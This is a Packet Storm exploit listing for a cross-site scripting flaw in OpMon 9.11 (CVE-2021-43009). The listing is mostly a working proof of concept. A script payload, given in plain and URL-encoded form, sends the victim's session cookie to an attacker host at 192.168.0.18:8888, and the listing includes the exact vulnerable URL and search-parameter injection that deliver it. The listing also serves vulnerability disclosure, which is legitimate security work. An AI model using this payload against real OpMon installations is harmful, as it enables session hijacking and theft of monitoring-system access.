Lucene search
P3tryxPACKETSTORM:166619HistoryApr 07, 2022 - 12:00 a.m.
Opmon 9.11 Cross Site Scripting
2022-04-0700:00:00
p3tryx
packetstormsecurity.com
230
0.002 Low
EPSS
Percentile
51.6%
`# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009
# URL POC:
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>
Url-encoded Payload
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
```
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};PAYLOAD&x=0&y=0
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
&x=0&y=0
```
`
Related
cve
cve
CVE-2021-43009
2022-04-08 20:15:09
nvd
nvd
CVE-2021-43009
2022-04-08 20:15:09
prion
prion
Cross site scripting
2022-04-08 20:15:00
cvelist
cvelist
CVE-2021-43009
2022-04-08 19:57:47
cnvd
cnvd
OpServices OpMon Cross-Site Scripting Vulnerability
2022-04-11 00:00:00
zdt
zdt
Opmon 9.11 - Cross-site Scripting Vulnerability
2022-04-07 00:00:00
exploitdb
exploitdb
Opmon 9.11 - Cross-site Scripting
2022-04-07 00:00:00